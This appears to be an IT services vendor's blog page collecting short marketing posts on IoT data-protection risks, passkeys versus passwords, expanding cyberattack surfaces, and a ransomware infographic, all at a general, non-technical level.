5-Tips-IOT-Internet-of-Things

Top 5 Threats IoT Devices Pose to Data Protection & Privacy

by Security

Gartner Inc. predicted that by 2023, CIOs would be responsible for over three times the endpoints they were responsible for in 2018 due to the rapid evolution of IoT trends and technologies. With billions of physical devices worldwide connected to the internet today, this prediction is on its way to coming true. However, the rapid evolution of IoT technology has proven to be a double-edged sword from a cybersecurity and compliance standpoint.

IoT devices produce immense volumes of various types of data that are stored, managed and shared within an organization’s IT infrastructure. Hence, they add to the risk landscape in more ways than one with respect to cybersecurity, third-party risk and compliance with data protection regulations.

Don’t let anyone tell you that securing IoT devices is only about securing the device itself. It’s also about securing the access that an IoT device provides. Besides looking at the device’s built-in vulnerabilities, you must also consider where and how IoT devices connect to your network, how they process and store data, and their user interface.

Over the course of this blog, we’ll tell you how IoT devices can be exploited, the top 5 threats they pose to data protection and privacy, and why you must secure them from a compliance point of view. Please pay close attention so you can protect your business from security disasters and avoid penalties and lawsuits that could arise from non-compliance with necessary regulations.
How IoT Devices Can Be Exploited
There are primarily three attack vectors through which IoT devices can be compromised:

• The devices themselves: Often, cybercriminals exploit IoT device vulnerabilities that exist in its memory, firmware, physical interface, web interface and network services. Additionally, other aspects such as unsecure default settings, outdated components and unsecure update mechanisms are also exploited.
• Communication channels: An IoT device could also be compromised by attacking the channels used to connect it with another IoT device. Security issues with the protocols used in IoT systems can put the entire network at risk, making IoT systems susceptible to network attacks like denial of service (DoS) and spoofing.
• Applications and software: Nefarious cybercriminals can exploit vulnerabilities in web applications and related software for IoT devices. For example, web applications can be targeted to steal user credentials or push malware.

Five Major Threats to Watch Out for
Having understood how IoT devices can be exploited to cause harm to your business, let’s now look at five major threats these devices pose to data protection and privacy. If you don’t take the necessary measures to mitigate these threats and maintain documented evidence of it, you can be penalized for non-compliance with at least one data protection regulation at some point.

  1. Abundant and Unauthorized Data Collection
    IoT sensors and devices collect enormous amounts of very specific data about the environment they are deployed in as well as the users. They even store and share sensitive data without one’s knowledge or explicit permission. Therefore, as per the compliance regulations applicable to your business or industry, this data must be secured the same way any other sensitive data in your business’ network would. For example, if you collect medical data in the U.S. through a set of IoT devices, you must safeguard it as per HIPAA regulations.

  2. A Backdoor Entry for Cybercriminals
    All it takes for a cybercriminal to ransack your network is a single IoT device that’s not fully secured. Even a malicious insider could carry out a full-fledged cyberattack on your business using an unsecure IoT device. Leaving these threats unchecked is unacceptable under any data protection regulation and hence warrants your immediate attention.
    • About 60% of IoT devices are vulnerable to medium- or high-severity attacks.1
    • Over 95% of all IoT device traffic is unencrypted.2
    • About 72% of organizations experienced an increase in endpoint and IoT security incidents last year and 56% of organizations expect to be compromised via an endpoint or IoT-originated attack within the next 12 months.

  3. A Single Security Policy Doesn’t Cut It
    IoT ecosystems are complex and add to the complexity of your IT environment as well. Given their unique nature, it’s neither realistic nor currently achievable to implement a “one size fits all” security policy for all IoT devices. The unprecedented surge in remote work has only amplified this challenge further.
    For example, while many businesses do not have personal devices in the office during the COVID-19 pandemic, employees have them at their homes (their new offices), which means business-related work and data could be accessed by exploiting such devices.
    The Ponemon Institute’s 2021 Data Exposure Report stated that home networks are 71% less secure than office networks. Should your business fail to mitigate this threat, it could result in severe consequences when the compliance auditor comes knocking.

    4. Inability to Train Everyone on IoT Security
    Security awareness training is a powerful way to curtail the likelihood and impact of cyberattacks. However, the lack of broad universal knowledge and awareness about IoT at the user level poses a potent threat to the protection of IoT data. It is an enormous challenge to train everyone on IoT functionality and the risks it brings to the table.

    Compliance regulations worldwide consider security awareness training a major piece of the data protection puzzle, which, if missing, could ensure a compliance audit doesn’t go in your business’ favor.

    5.Threat to Privacy
    It’s undeniable that IoT devices pose a direct threat to the privacy of both your clients and even their customers. With every bit of data they provide to your business through an IoT device, they surrender a bit of their privacy. Therefore, it’s your responsibility to protect their privacy and data. Failing to do so could cost you dearly. For example, as per the EU’s GDPR, every user must have the “right to be forgotten,” and if your business fails to provide this, you will be penalized for non-compliance.


IoT Risks and Compliance
While there are no universal regulatory requirements or “standards” for the security of IoT devices, please do not assume that risks to IoT data and devices aren’t on the radar of regulators worldwide. This isn’t just a matter of cybersecurity but compliance as well. While investing in the right security solutions will enhance your business’ cybersecurity posture against IoT-related risks, you certainly need assistance in tackling this challenge from a compliance point of view.

Using our compliance process automation platform, we can help you detect IoT risks in regular compliance risk assessments, undertake remediation measures and produce automatically generated documented evidence of compliance. To top it all off, you will be able to prevent IoT-related risks associated with compliance standards such as HIPAA, GDPR, Essential Eight and NIST CSF, as well as your cyber insurance policy. All you need to do is send us an email and we can help you get started.

protecting-pword

Is It Time to Ditch the Passwords for More Secure Passkeys?

by ComplianceSecurity

Passwords are the most used method of authentication, but they are also one of the weakest. Passwords are often easy to guess or steal. Also, many people use the same password across several accounts. This makes them vulnerable to cyber-attacks. The sheer volume of passwords that people need to remember is large. This leads to habits that make it easier for criminals to breach passwords. Such as creating weak passwords and storing passwords in a non-secure way. 61% of all data breaches involve stolen or hacked login credentials. In recent years a better solution has emerged – passkeys. Passkeys are more secure than passwords. They also provide a more convenient way of logging into your accounts.

What is Passkey Authentication?

Passkeys work by generating a unique code for each login attempt. This code is then validated by the server. This code is created using a combination of information about the user and the device they are using to log in. You can think of passkeys as a digital credential. A passkey allows someone to authenticate in a web service or a cloud-based account. There is no need to enter a username and password. This authentication technology leverages Web Authentication (WebAuthn). This is a core component of FIDO2, an authentication protocol. Instead of using a unique password, it uses public-key cryptography for user verification. The user’s device stores the authentication key. This can be a computer, mobile device, or security key device. It is then used by sites that have passkeys enabled to log the user in.

Advantages of Using Passkeys Instead of Passwords

More Secure

One advantage of passkeys is that they are more secure than passwords. Passkeys are more difficult to hack. This is true especially if the key generates from a combination of biometric and device data. Biometric data can include things like facial recognition or fingerprint scans. Device information can include things like the device’s MAC address or location. This makes it much harder for hackers to gain access to your accounts.

More Convenient

Another advantage of passkeys over passwords is that they are more convenient. With password authentication, users often must remember many complex passwords. This can be difficult and time-consuming. Forgetting passwords is common and doing a reset can slow an employee down. Each time a person has to reset their password, it takes an average of three minutes and 46 seconds. Passkeys erase this problem by providing a single code. You can use that same code across all your accounts. This makes it much easier to log in to your accounts. It also reduces the likelihood of forgetting or misplacing your password.

Phishing-Resistant

Credential phishing scams are prevalent. Scammers send emails that tell a user something is wrong with their account. They click on a link that takes them to a disguised login page created to steal their username and password. When a user is authenticating with a passkey instead, this won’t work on them. Even if a hacker had a user’s password, it wouldn’t matter. They would need the device passkey authentication to breach the account.

Are There Any Disadvantages to Using Passkeys?

Passkeys are definitely looking like the future of authentication technology. But there are some issues that you may run into when adopting them right now.

Passkeys Aren’t Yet Widely Adopted

One of the main disadvantages is that passkeys are not yet widely adopted. Many websites and cloud services still rely on passwords. They don’t have passkey capability yet. This means that users may have to continue using passwords for some accounts. At least until passkeys become more widely adopted. It could be slightly awkward to use passkeys for some accounts and passwords for others.

Passkeys Need Extra Hardware & Software

One thing about passwords is that they’re free and easy to use. You simply make them up as you sign up for a site. Passkeys need extra hardware and software to generate and validate the codes. This can be costly for businesses to put in place at first. But there is potential savings from improved security and user experience. These benefits can outweigh the cost of passkeys.

Prepare Now for the Future of Authentication

Passkeys are a more secure and convenient alternative to passwords. They are more difficult to hack, and they provide a more convenient way of logging into your accounts. But passkeys are not yet widely adopted. Additionally, businesses may need to budget for implementation. Despite these challenges, passkeys represent a promising solution. Specifically, to the problem of weak passwords. They have the potential to improve cybersecurity. As well as boost productivity for businesses and individuals alike.

Need Help Improving Your Identity & Account Security?

Take advantage of the new passkey authentication by exploring it now. It’s the perfect time to ease in and begin putting it in place for your organization. Give us a call today to schedule a consultation. Article used with permission from The Technology Press.

Cybersecurity-attack-surfaces

4 Reasons Cybersecurity Attack Surfaces Are Expanding

by Security

4 Reasons Cybersecurity Attack Surfaces Are Expanding

The COVID-19 pandemic impacted individuals and businesses all over the world in one way or another. Almost overnight, it disrupted the way people went about their daily routines and how companies operated. Amidst all the chaos, changes to the cyber landscape increased at an unprecedented pace. Some of the trends that powered these changes and continue to fuel them are:

1. Increased Use of Internet of Things (IoT)
• About 56 federal agencies in the U.S. reported using Internet of Things (IoT) technologies.1
• In 2021, experts expect the number of connected devices to reach 10.07 billion.2

2. Rapid Adoption of the Cloud
• Global public cloud end-user expenditure is expected to grow by over 18% in 2021.3

3. Digital Transformation
• IT spending is expected to hit $3.9 trillion in 2021.3
• Spending on digital transformation technologies increased from $1 trillion in 2018 to $2.39 trillion in 2021.2

4. Work-From-Home Model
• Over 70% of all departments and teams are expected to have remote workers by 2028.4

With an expanding attack surface comes cybercrime. According to an FBI report, cyberattacks have skyrocketed by over 400% since the start of the pandemic, making it imperative to identify and deflate cyberthreats for the health and future of your business.

Growing Cybersecurity Risks

1. Targeted Ransomware Attack
Ransomware attacks have long been a nuisance to businesses. Experts have estimated that about 10% of breaches reported in 2021, so far, involved ransomware.5 The success of this mode of attack is attributed to the simplicity with which an attacker can wreak havoc. It should worry everyone that ransomware kits are inexpensively available on the dark web.
Ransomware propagators are constantly devising new plans to evade defenses set by businesses. Without precautionary measures in place, SMBs could find themselves at risk.

2. Phishing Attacks
Phishing uses social engineering in email and cloud services attacks. Phishing attacks can lead to account takeover, credential theft and more. According to one report, phishing attacks increased by 11% in 2021 alone.5

Malicious actors using phishing scams as their method of attack are cunning enough to tilt every global event to their advantage. For example, when the pandemic started, phishing emails were sent out to the masses in the name of the World Health Organization (WHO). Later, when vaccines were rolled out, scam emails had a vaccine company’s name as the sender.

3. Insider Threats
Shockingly, close to 20% of breaches involve internal actors.5 The problem with insider threats is that they’re often the toughest to detect.

The most common causes of inside incidents are:
• Negligent employees or contractors 6 – 62%
• Criminal or malicious insiders6 – 23%
• Credential theft 6 – 14%

4. Fileless Attacks
A fileless attack aims to exploit the features and tools of a victim’s environment. It doesn’t depend on file-dependent payloads nor does it generate a new file. This leaves no footprint and makes fileless attacks very hard to detect. A fileless attack is reported to be 10 times more successful than a file-based attack.7

Fileless attacks can originate through an email that directs you to a malicious website. From there, using social engineering tactics, the cybercriminal can use system tools (such as PowerShell) to distribute payloads and execute commands. Since these system tools are part of your IT environment, the threat can evade outdated security systems.

How to Stay Protected

You can ramp up your IT security and protect your business by following these steps:

• Keep your systems updated and safe from cyberattacks that exploit known software vulnerabilities by automating patch and vulnerability management.
• Ensure effective and quick recovery from cyber disruption by backing up your systems and SaaS applications.
• Secure your systems by deploying advanced antivirus and antimalware solutions that provide endpoint detection and response (EDR).
• Make sure every new device has the necessary security tools to start with — local firewall, DNS filtering, malware protection, multifactor authentication (MFA) and disk encryption.
• Always be ready with an incident response plan. No breach can shake you if you have a robust action plan. The plan should have a communication strategy with all stakeholders, including your investors and valued customers.
• Provide regular security training to your employees and vendors.

If thinking about assessing your current cybersecurity posture gives you anxiety and you’re not sure where to start, don’t worry. We can take the assessment off your plate and suggest the right solutions for your business. An experienced partner like us can make your cybersecurity journey seamless and successful. Contact us today for your cybersecurity assessment.

 

Sources:
1. US GAO-20-577 Report
2. Statista
3. Gartner
4. Upwork Report
5. Verizon 2021 DBIR
6. 2020 Cost of Insider Threats: Global Report
7. Ponemon Institute

Anatomy of a Ransomeware Attack infographic cover image for blog

The Secret to Fighting Ransomware

by Security

Understanding How It Begins

Our infographic will walk you through the lifecycle of a ransomware attack step by step.

Every business owner knows ransomware is awful, but do you really understand what it is, how it works and to what extent it can damage your business?

Our infographic, “The Anatomy of a Ransomware Attack,” explains the seven key steps hackers take to successfully infiltrate an organization’s network. You’ll get a better understanding of:

  • How a cyber gang starts its operation
  • How they pick targets
  • How they get paid
    And more

Don’t let hackers stop you from achieving your business goals. Download the infographic now to learn how ransomware works and stop cybercriminals in their tracks.